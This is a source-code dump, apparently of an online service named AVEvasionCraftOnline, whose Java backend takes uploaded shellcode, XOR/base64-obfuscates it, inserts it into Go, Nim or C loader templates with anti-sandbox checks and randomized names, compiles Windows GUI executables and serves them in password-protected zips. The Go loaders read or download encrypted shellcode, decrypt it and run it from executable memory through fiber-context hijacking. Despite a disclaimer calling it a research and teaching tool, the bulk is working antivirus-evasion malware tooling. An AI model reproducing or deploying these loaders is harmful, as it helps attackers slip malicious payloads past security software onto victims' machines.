transformation: 66 | - base64Xor 67 | - xor 68 | 69 | go_SetTimer: 70 | loadMethod: 71 | - EMBEDDED 72 | - REMOTE 73 | - LOCAL 74 | transformation: 75 | - base64Xor 76 | - xor 77 | 78 | go_SymEnumProcesses: 79 | loadMethod: 80 | - EMBEDDED 81 | - REMOTE 82 | - LOCAL 83 | transformation: 84 | - base64Xor 85 | - xor 86 | 87 | nim_VirtualAlloc: 88 | loadMethod: 89 | - EMBEDDED 90 | - LOCAL 91 | transformation: 92 | - xor 93 | 94 | c_VirtualAlloc: 95 | loadMethod: 96 | - EMBEDDED 97 | transformation: 98 | - none 99 | compiler-c: x86_64-w64-mingw32-gcc 100 | compiler-nim: nim 101 | compiler-golang: go 102 | 103 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/LOCAL/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | CreateFiber = kernel32.NewProc("CreateFiber") 27 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 28 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func dummy() { 33 | var age string 34 | fmt.Scanln(&age) 35 | } 36 | 37 | func Callback(shellcode []byte) { 38 | var d func() 39 | d = dummy 40 | ConvertThreadToFiber.Call(NULL) 41 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 42 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 43 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), 
uintptr(len(shellcode))) 44 | if lpFiber == NULL { 45 | fmt.Printf("GLE : %d\n", err1) 46 | os.Exit(0) 47 | } 48 | 49 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 50 | *tgtFuncAddr = addr 51 | fmt.Println(tgtFuncAddr) 52 | SwitchToFiber.Call(lpFiber) 53 | } 54 | 55 | func XorDecrypt(plaintext []byte, key []byte) []byte { 56 | ciphertext := make([]byte, len(plaintext)) 57 | keyLength := len(key) 58 | for i, byte := range plaintext { 59 | keyByte := key[i%keyLength] 60 | encryptedByte := byte ^ keyByte 61 | ciphertext[i] = encryptedByte 62 | } 63 | return ciphertext 64 | } 65 | 66 | func DecryptData(shellcode []byte) []byte { 67 | key := []byte{{{Key}}} 68 | decryptShellcode := XorDecrypt(shellcode, key) 69 | return decryptShellcode 70 | } 71 | 72 | func main() { 73 | args := os.Args[0] 74 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 75 | os.Exit(0) 76 | } 77 | 78 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 79 | if err != nil { 80 | return 81 | } 82 | byteData := DecryptData(ciphertext) 83 | Callback(byteData) 84 | } 85 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/LOCAL/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | CreateFiber = kernel32.NewProc("CreateFiber") 28 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 29 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 30 | RtlMoveMemory = 
ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func dummy() { 34 | var age string 35 | fmt.Scanln(&age) 36 | } 37 | 38 | func Callback(shellcode []byte) { 39 | var d func() 40 | d = dummy 41 | ConvertThreadToFiber.Call(NULL) 42 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 43 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 44 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 45 | if lpFiber == NULL { 46 | fmt.Printf("GLE : %d\n", err1) 47 | os.Exit(0) 48 | } 49 | 50 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 51 | *tgtFuncAddr = addr 52 | fmt.Println(tgtFuncAddr) 53 | SwitchToFiber.Call(lpFiber) 54 | } 55 | 56 | func XorDecrypt(plaintext []byte, key []byte) []byte { 57 | ciphertext := make([]byte, len(plaintext)) 58 | keyLength := len(key) 59 | for i, byte := range plaintext { 60 | keyByte := key[i%keyLength] 61 | encryptedByte := byte ^ keyByte 62 | ciphertext[i] = encryptedByte 63 | } 64 | return ciphertext 65 | } 66 | 67 | func DecryptData(v2 string) []byte { 68 | key := []byte{{{Key}}} 69 | v22, _ := base64.StdEncoding.DecodeString(v2) 70 | v222 := XorDecrypt(v22, key) 71 | return v222 72 | } 73 | 74 | func main() { 75 | args := os.Args[0] 76 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 77 | os.Exit(0) 78 | } 79 | 80 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 81 | if err != nil { 82 | return 83 | } 84 | byteData := DecryptData(string(ciphertext)) 85 | Callback(byteData) 86 | } 87 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/xor/REMOTE/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | g_InitOnce [0]byte 
14 | lpContext [0]byte 15 | ) 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | CreateFiber = kernel32.NewProc("CreateFiber") 29 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 30 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func dummy() { 35 | var age string 36 | fmt.Scanln(&age) 37 | } 38 | 39 | func Callback(shellcode []byte) { 40 | var d func() 41 | d = dummy 42 | ConvertThreadToFiber.Call(NULL) 43 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 44 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 45 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 46 | if lpFiber == NULL { 47 | fmt.Printf("GLE : %d\n", err1) 48 | os.Exit(0) 49 | } 50 | 51 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 52 | *tgtFuncAddr = addr 53 | fmt.Println(tgtFuncAddr) 54 | SwitchToFiber.Call(lpFiber) 55 | } 56 | 57 | func XorDecrypt(plaintext []byte, key []byte) []byte { 58 | ciphertext := make([]byte, len(plaintext)) 59 | keyLength := len(key) 60 | for i, byte := range plaintext { 61 | keyByte := key[i%keyLength] 62 | encryptedByte := byte ^ keyByte 63 | ciphertext[i] = encryptedByte 64 | } 65 | return ciphertext 66 | } 67 | 68 | func DecryptData(shellcode []byte) []byte { 69 | key := []byte{{{Key}}} 70 | decryptShellcode := XorDecrypt(shellcode, key) 71 | return decryptShellcode 72 | } 73 | 74 | func fetchShellcode(url string) []byte { 75 | _, body, _ := fasthttp.Get(nil, url) 76 | return body 77 | } 78 | 79 | func main() { 80 | args := os.Args[0] 81 | if args[10] == 92 && (args[0] == 99 || 
args[0] == 67) { 82 | os.Exit(0) 83 | } 84 | 85 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 86 | byteData := DecryptData(ciphertext) 87 | Callback(byteData) 88 | } 89 | -------------------------------------------------------------------------------- /template/go/go_FiberContextEdit/base64Xor/REMOTE/go_FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loads 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "os" 7 | "syscall" 8 | "unsafe" 9 | 10 | "github.com/valyala/fasthttp" 11 | ) 12 | 13 | var ( 14 | g_InitOnce [0]byte 15 | lpContext [0]byte 16 | ) 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | MEM_RESERVE = 0x2000 21 | PAGE_EXECUTE_READWRITE = 0x40 22 | NULL = 0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | CreateFiber = kernel32.NewProc("CreateFiber") 30 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 31 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 32 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 33 | ) 34 | 35 | func dummy() { 36 | var age string 37 | fmt.Scanln(&age) 38 | } 39 | 40 | func Callback(shellcode []byte) { 41 | var d func() 42 | d = dummy 43 | ConvertThreadToFiber.Call(NULL) 44 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 45 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 46 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 47 | if lpFiber == NULL { 48 | fmt.Printf("GLE : %d\n", err1) 49 | os.Exit(0) 50 | } 51 | 52 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 53 | *tgtFuncAddr = addr 54 | fmt.Println(tgtFuncAddr) 55 | SwitchToFiber.Call(lpFiber) 56 | } 57 | 58 | func XorDecrypt(plaintext []byte, key []byte) []byte { 59 | ciphertext := make([]byte, 
len(plaintext)) 60 | keyLength := len(key) 61 | for i, byte := range plaintext { 62 | keyByte := key[i%keyLength] 63 | encryptedByte := byte ^ keyByte 64 | ciphertext[i] = encryptedByte 65 | } 66 | return ciphertext 67 | } 68 | 69 | func DecryptData(v2 string) []byte { 70 | key := []byte{{{Key}}} 71 | v22, _ := base64.StdEncoding.DecodeString(v2) 72 | v222 := XorDecrypt(v22, key) 73 | return v222 74 | } 75 | 76 | func fetchShellcode(url string) []byte { 77 | _, body, _ := fasthttp.Get(nil, url) 78 | return body 79 | } 80 | 81 | func main() { 82 | args := os.Args[0] 83 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 84 | os.Exit(0) 85 | } 86 | 87 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 88 | byteData := DecryptData(string(ciphertext)) 89 | Callback(byteData) 90 | } 91 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/App.vue: -------------------------------------------------------------------------------- 1 | 13 | 48 | 49 | 50 | 53 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/ShellcodeProcessor.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import java.io.File; 4 | import java.io.IOException; 5 | import java.nio.file.Path; 6 | import java.util.Base64; 7 | 8 | 9 | 10 | public class ShellcodeProcessor { 11 | 12 | private static final int TEMPLATE_XOR_LEN = 10; 13 | private static byte[] key; 14 | 15 | public static String transformation(byte[] shellcode, String transformationMethod, Path outputFilename) throws IOException { 16 | key = generateRandomKey(); 17 | String result = switch (transformationMethod) { 18 | case "base64Xor" -> base64XorEncrypt(shellcode); 19 | case "xor" -> xorEncryptAndConvertToHexString(shellcode); 20 | case "none" -> 
TextFileProcessor.convertToHexStringWithPrefix(shellcode); 21 | default -> throw new IllegalStateException("Unexpected value: " + transformationMethod); 22 | }; 23 | 24 | assert result != null; 25 | Path of = Path.of(outputFilename + ".bin"); 26 | if (transformationMethod.equals("base64Xor")) { 27 | FileUtils.saveFileBytes(of, result.getBytes()); 28 | } else { 29 | FileUtils.saveFileBytes(of, TextFileProcessor.convertHexStringToByteArray(result)); 30 | } 31 | return result; 32 | } 33 | public static String getKey() { 34 | return TextFileProcessor.convertToHexStringWithPrefix(key); 35 | } 36 | private static String base64XorEncrypt(byte[] shellcode) { 37 | byte[] encryptedBytes = xorEncrypt(shellcode); 38 | return Base64.getEncoder().encodeToString(encryptedBytes); 39 | } 40 | 41 | private static String xorEncryptAndConvertToHexString(byte[] shellcode) { 42 | byte[] encryptedBytes = xorEncrypt(shellcode); 43 | return TextFileProcessor.convertToHexStringWithPrefix(encryptedBytes); 44 | } 45 | 46 | private static byte[] xorEncrypt(byte[] plaintext) { 47 | byte[] ciphertext = new byte[plaintext.length]; 48 | int keyLength = key.length; 49 | 50 | for (int i = 0; i < plaintext.length; i++) { 51 | byte keyByte = key[i % keyLength]; 52 | byte encryptedByte = (byte) (plaintext[i] ^ keyByte); 53 | ciphertext[i] = encryptedByte; 54 | } 55 | 56 | return ciphertext; 57 | } 58 | 59 | private static byte[] generateRandomKey() { 60 | return TextFileProcessor.generateRandomString(TEMPLATE_XOR_LEN).getBytes(); 61 | } 62 | 63 | private static String generateRandomFilename() { 64 | return TextFileProcessor.generateRandomString(TEMPLATE_XOR_LEN); 65 | } 66 | // 67 | // public static String noneProcess(String shellcode, String templateCode) { 68 | // 69 | // return templateCode.replace(TEMPLATE_LEN_PLACEHOLDER, String.valueOf(countCommas(shellcode) + 1)) 70 | // .replace(TEMPLATE_SHELLCODE_PLACEHOLDER, shellcode); 71 | // } 72 | 73 | } 74 | 
-------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 3.2.2 9 | 10 | 11 | com.yutian4060 12 | AVEvasionCraftOnline 13 | 0.0.1-SNAPSHOT 14 | AVEvasionCraftOnline 15 | AVEvasionCraftOnline 16 | 17 | 17 18 | 19 | 20 | 21 | org.springframework.boot 22 | spring-boot-starter-web 23 | 24 | 25 | 26 | org.projectlombok 27 | lombok 28 | true 29 | 30 | 31 | org.springframework.boot 32 | spring-boot-starter-test 33 | test 34 | 35 | 36 | 37 | net.lingala.zip4j 38 | zip4j 39 | 2.11.3 40 | 41 | 42 | 43 | 44 | AVEvasionCraftOnline 45 | 46 | 47 | src/main/resources/static 48 | META-INF/resources/ 49 | 50 | 51 | src/main/resources/static 52 | 53 | sql/** 54 | *.yml 55 | logback.xml 56 | 57 | false 58 | 59 | 60 | 61 | 62 | org.springframework.boot 63 | spring-boot-maven-plugin 64 | 65 | 66 | 67 | org.projectlombok 68 | lombok 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/TextFileProcessor.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import java.io.IOException; 4 | import java.nio.file.Files; 5 | import java.nio.file.Path; 6 | import java.util.Arrays; 7 | import java.util.List; 8 | import java.util.Objects; 9 | import java.util.Random; 10 | 11 | public class TextFileProcessor { 12 | 13 | private static final String CHARACTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 14 | private static final int FUNCTION_NAME_LENGTH = 10; 15 | 16 | public static String replaceFunctionNames(String code, List variableNames) { 17 | for (String variableName : variableNames) { 18 | String 
generatedVariableName = generateRandomString(FUNCTION_NAME_LENGTH); 19 | code = code.replace(variableName, generatedVariableName); 20 | } 21 | return code; 22 | } 23 | 24 | public static String antiSandbox(String code, List antiLists) throws IOException { 25 | for(Integer antiList : antiLists) { 26 | code = code.replace(antiList.toString(), Files.readString(Path.of("C:\\1bypassAVOnline\\antisandbox\\" + antiList))); 27 | } 28 | System.out.println(code); 29 | Files.write(Path.of("C:\\1bypassAVOnline\\antisandbox\\out1.go"), code.getBytes()); 30 | return code; 31 | } 32 | 33 | public static String generateRandomString(int length) { 34 | Random random = new Random(); 35 | StringBuilder randomString = new StringBuilder(length); 36 | for (int i = 0; i < length; i++) { 37 | char randomChar = (char) (random.nextInt(26) + 'A'); // 生成随机大写字母 38 | randomString.append(randomChar); 39 | } 40 | return randomString.toString(); 41 | } 42 | 43 | public static String convertToHexStringWithoutPrefix(byte[] bytes) { 44 | StringBuilder sb = new StringBuilder(); 45 | for (byte b : bytes) { 46 | sb.append(String.format("%02x", b)); 47 | } 48 | return sb.toString(); 49 | } 50 | 51 | 52 | public static String convertToHexStringWithPrefix(byte[] bytes) { 53 | StringBuilder hexString = new StringBuilder(); 54 | for (byte b : bytes) { 55 | hexString.append(String.format("0x%02X, ", b)); 56 | } 57 | 58 | // 移除最后一个逗号和空格 59 | hexString.deleteCharAt(hexString.length() - 2); 60 | return hexString.toString(); 61 | } 62 | 63 | public static byte[] convertHexStringToByteArray(String hexString) { 64 | String[] hexValues = hexString.split(",\\s+"); // 按逗号和空格分割字符串 65 | byte[] byteArray = new byte[hexValues.length]; 66 | for (int i = 0; i < hexValues.length; i++) { 67 | String hexValue = hexValues[i].trim().substring(2); // 去除前导的 "0x" 或 "0X" 68 | int decimalValue = Integer.parseInt(hexValue, 16); // 将十六进制值转换为整数 69 | byteArray[i] = (byte) decimalValue; 70 | } 71 | return byteArray; 72 | } 73 | 74 | public 
static int countCommas(String text) { 75 | int count = 0; 76 | 77 | for (int i = 0; i < text.length(); i++) { 78 | if (text.charAt(i) == ',') { 79 | count++; 80 | } 81 | } 82 | 83 | return count; 84 | } 85 | 86 | 87 | } 88 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/components/ProcessValueLookup.vue: -------------------------------------------------------------------------------- 1 | 18 | 19 | 81 | 82 | 100 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/CompilerCode.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import com.yutian4060.avevasioncraftonline.config.BypassAVConfigProperties; 4 | import com.yutian4060.avevasioncraftonline.service.impl.CompileServiceImpl; 5 | import jakarta.annotation.PostConstruct; 6 | import org.slf4j.Logger; 7 | import org.slf4j.LoggerFactory; 8 | import org.springframework.beans.factory.annotation.Autowired; 9 | import org.springframework.stereotype.Component; 10 | 11 | import java.io.BufferedReader; 12 | import java.io.File; 13 | import java.io.IOException; 14 | import java.io.InputStreamReader; 15 | import java.util.List; 16 | import java.util.UUID; 17 | 18 | @Component 19 | public class CompilerCode { 20 | 21 | public static BypassAVConfigProperties bypassAVConfigProperties; 22 | private static final Logger logger = LoggerFactory.getLogger(CompilerCode.class); 23 | private static String WORKING_DIRECTORY; 24 | @Autowired 25 | public void setApplicationProperties(BypassAVConfigProperties bypassAVConfigProperties) { 26 | CompilerCode.bypassAVConfigProperties = bypassAVConfigProperties; 27 | } 28 | 29 | @PostConstruct 30 | private void initializeConstants() { 31 | WORKING_DIRECTORY = bypassAVConfigProperties.getCompilerWorkDirectory(); 32 | 
} 33 | 34 | public static void compileNim(String destinationPath, String builderWorkPath) { 35 | List command = List.of("nim", "c", "-d=release", "-d=mingw", "--app=gui", "-d:strip", "--opt:size", 36 | "--cpu=amd64", "-o:" + destinationPath + ".exe", destinationPath); 37 | logger.info("Builder Command: {}", command); 38 | executeCommand(command, builderWorkPath); 39 | } 40 | 41 | public static void compileGo(String destinationPath, String builderWorkPath) { 42 | List command = List.of("go", "build", "-ldflags=-s -w -H=windowsgui", "-trimpath", "-o", destinationPath + ".exe", destinationPath); 43 | logger.info("Builder Command: {}", command); 44 | executeCommand(command, builderWorkPath); 45 | } 46 | 47 | public static void compileC(String destinationPath, String builderWorkPath) { 48 | List command = List.of("x86_64-w64-mingw32-gcc", "-o", destinationPath + ".exe", destinationPath); 49 | logger.info("Builder Command: {}", command); 50 | executeCommand(command, builderWorkPath); 51 | } 52 | 53 | private static void executeCommand(List command, String builderWorkPath) { 54 | try { 55 | 56 | ProcessBuilder processBuilder = new ProcessBuilder(command); 57 | processBuilder.directory(new File(WORKING_DIRECTORY + File.separator + builderWorkPath)); 58 | Process process = processBuilder.start(); 59 | 60 | int exitCode = process.waitFor(); 61 | 62 | if (exitCode == 0) { 63 | logger.info("Compilation successful"); 64 | } else { 65 | logger.error("Compilation failed with exit code: {}", exitCode); 66 | printErrorStream(process); 67 | } 68 | } catch (IOException | InterruptedException e) { 69 | logger.error("Error during compilation", e); 70 | } 71 | } 72 | 73 | private static void printErrorStream(Process process) throws IOException { 74 | try (BufferedReader reader = new BufferedReader(new InputStreamReader(process.getErrorStream()))) { 75 | String line; 76 | while ((line = reader.readLine()) != null) { 77 | logger.error(line); 78 | } 79 | } 80 | } 81 | 82 | public static 
String getRandomDirectorName() { 83 | return UUID.randomUUID().toString(); 84 | } 85 | 86 | } 87 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/controller/CompilerController.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.controller; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.CompilationResponseDTO; 4 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 5 | import com.yutian4060.avevasioncraftonline.enums.Result; 6 | import com.yutian4060.avevasioncraftonline.service.CompileService; 7 | import com.yutian4060.avevasioncraftonline.utils.FileUtils; 8 | import jakarta.annotation.Resource; 9 | import org.slf4j.Logger; 10 | import org.slf4j.LoggerFactory; 11 | import org.springframework.beans.factory.annotation.Autowired; 12 | import org.springframework.beans.factory.annotation.Value; 13 | import org.springframework.http.*; 14 | import org.springframework.web.bind.annotation.*; 15 | 16 | import java.io.File; 17 | import java.io.IOException; 18 | 19 | @RestController 20 | public class CompilerController { 21 | 22 | @Resource 23 | CompileService compileService; 24 | 25 | @Value("${bypassav.storage-directory}") 26 | String downloadDirector; 27 | 28 | private static final Logger logger = LoggerFactory.getLogger(CompilerController.class); 29 | 30 | @PostMapping("/api/compiler") 31 | public Result shellcodeUpload(@ModelAttribute ShellcodeUploadDTO shellcodeUploadDTO) throws IOException { 32 | CompilationResponseDTO result = null; 33 | 34 | logger.info("Received shellcode upload:"); 35 | logger.info("Template Language: {}", shellcodeUploadDTO.getTemplateLanguage()); 36 | logger.info("Shellcode length: {}", shellcodeUploadDTO.getShellcode().getBytes().length); 37 | logger.info("Template Name: {}", shellcodeUploadDTO.getTemplateName()); 38 | 
logger.info("Transformation: {}", shellcodeUploadDTO.getTransformation()); 39 | logger.info("Storage Type: {}", shellcodeUploadDTO.getStorageType()); 40 | logger.info("Additional Parameter: {}", shellcodeUploadDTO.getAdditionalParameter()); 41 | 42 | ShellcodeUploadDTO.StorageType storageType = shellcodeUploadDTO.getStorageType(); 43 | 44 | if (shellcodeUploadDTO.getShellcode().getBytes().length > 5200000 || shellcodeUploadDTO.getShellcode().getBytes().length < 200) { 45 | logger.warn("File Size: {}", shellcodeUploadDTO.getShellcode().getBytes().length); 46 | return Result.error(); 47 | } 48 | 49 | if (storageType != ShellcodeUploadDTO.StorageType.REMOTE && 50 | storageType != ShellcodeUploadDTO.StorageType.EMBEDDED && 51 | storageType != ShellcodeUploadDTO.StorageType.LOCAL) { 52 | logger.warn("storageType: {}", storageType); 53 | return Result.error(); 54 | } 55 | 56 | String templateLanguage = shellcodeUploadDTO.getTemplateLanguage(); 57 | switch (templateLanguage) { 58 | case "c" -> result = compileService.compileCodeC(shellcodeUploadDTO); 59 | case "nim" -> result = compileService.compileCodeNim(shellcodeUploadDTO); 60 | case "go" -> result = compileService.compileCodeGo(shellcodeUploadDTO); 61 | default -> Result.error(); 62 | } 63 | 64 | if (result == null) { 65 | return Result.error(); 66 | } 67 | 68 | return Result.success(result); 69 | } 70 | 71 | @GetMapping("/api/download/(unknown)") 72 | public ResponseEntity downloadFile(@PathVariable String filename) { 73 | byte[] fileBytes = FileUtils.readFileBytes(downloadDirector + File.separator + filename.substring(0, filename.lastIndexOf(".")) + File.separator + filename); 74 | 75 | String contentType = "application/octet-stream"; 76 | 77 | HttpHeaders headers = new HttpHeaders(); 78 | headers.setContentType(MediaType.parseMediaType(contentType)); 79 | headers.setContentDisposition(ContentDisposition.attachment().filename(filename).build()); 80 | 81 | return new ResponseEntity<>(fileBytes, headers, 
HttpStatus.OK); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Backend/src/main/java/com/yutian4060/avevasioncraftonline/utils/FileUtils.java: -------------------------------------------------------------------------------- 1 | package com.yutian4060.avevasioncraftonline.utils; 2 | 3 | import com.yutian4060.avevasioncraftonline.dto.ShellcodeUploadDTO; 4 | import net.lingala.zip4j.ZipFile; 5 | import net.lingala.zip4j.model.ZipParameters; 6 | import net.lingala.zip4j.model.enums.EncryptionMethod; 7 | import org.slf4j.Logger; 8 | import org.slf4j.LoggerFactory; 9 | import org.springframework.util.FileSystemUtils; 10 | 11 | import java.io.File; 12 | import java.io.IOException; 13 | import java.nio.charset.StandardCharsets; 14 | import java.nio.file.Files; 15 | import java.nio.file.Path; 16 | import java.nio.file.StandardCopyOption; 17 | import java.util.Arrays; 18 | import java.util.List; 19 | 20 | public class FileUtils { 21 | 22 | private static final Logger logger = LoggerFactory.getLogger(FileUtils.class); 23 | 24 | public static String writeREADME(ShellcodeUploadDTO shellcodeUploadDTO) { 25 | String shellcodeName = null; 26 | if (shellcodeUploadDTO.getAdditionalParameter().equals("")) { 27 | shellcodeName = "内嵌"; 28 | } 29 | String storageType = switch (shellcodeUploadDTO.getStorageType()) { 30 | case REMOTE -> "远程存储 Shellcode"; 31 | case LOCAL -> "本地存储 Shellcode"; 32 | default -> "内嵌存储 Shellcode"; 33 | }; 34 | 35 | return String.format(""" 36 | 本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。 37 | 作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。 38 | 39 | 本工具使用 MIT 许可证。 40 | 项目地址:https://github.com/yutianqaq/AVEvasionCraftOnline 41 | 42 | Shellcode 加载方式:%s 43 | Shellcode 转换方式:%s 44 | Shellcode 存储方式:%s 45 | Shellcode 资源名称:%s 46 | """, shellcodeUploadDTO.getTemplateName(), shellcodeUploadDTO.getTransformation(), 47 | storageType, shellcodeName); 48 | } 49 | public static void 
saveFileZIP(String zipFileName, String filePath, String outputShellcodeFilePath, String storageDirectory, String readme) throws IOException { 50 | Path storagePath = Path.of(storageDirectory); 51 | Files.createDirectories(storagePath); 52 | 53 | String zipPassword = "yutian"; 54 | 55 | try (ZipFile zipFile = new ZipFile(storagePath + File.separator + zipFileName + ".zip", zipPassword.toCharArray())) { 56 | ZipParameters zipParameters = new ZipParameters(); 57 | zipParameters.setEncryptFiles(true); 58 | zipParameters.setEncryptionMethod(EncryptionMethod.ZIP_STANDARD); 59 | 60 | // 添加文件到压缩包,包括文本内容 61 | List filesToAdd = Arrays.asList( 62 | new File(filePath), 63 | new File(outputShellcodeFilePath), 64 | createTextFileInMemory(readme) 65 | ); 66 | 67 | zipFile.addFiles(filesToAdd, zipParameters); 68 | } 69 | 70 | Files.delete(Path.of(filePath)); // 删除二进制文件 71 | Files.delete(Path.of(outputShellcodeFilePath)); // 删除其他文件 72 | 73 | } 74 | 75 | private static File createTextFileInMemory(String readme) throws IOException { 76 | Path tempTextFilePath = Files.createTempFile("README", ".txt"); 77 | Files.writeString(tempTextFilePath, readme, StandardCharsets.UTF_8); 78 | return tempTextFilePath.toFile(); 79 | } 80 | 81 | public static byte[] readFileBytes(String filePath) { 82 | try { 83 | return Files.readAllBytes(Path.of(filePath)); 84 | } catch (IOException e) { 85 | e.printStackTrace(); 86 | return null; 87 | } 88 | } 89 | 90 | public static boolean copyFile(String sourcePath, String destinationPath) { 91 | try { 92 | Files.copy(Path.of(sourcePath), Path.of(destinationPath), StandardCopyOption.REPLACE_EXISTING); 93 | return true; 94 | } catch (IOException e) { 95 | e.printStackTrace(); 96 | return false; 97 | } 98 | } 99 | 100 | public static void saveFileBytes(Path 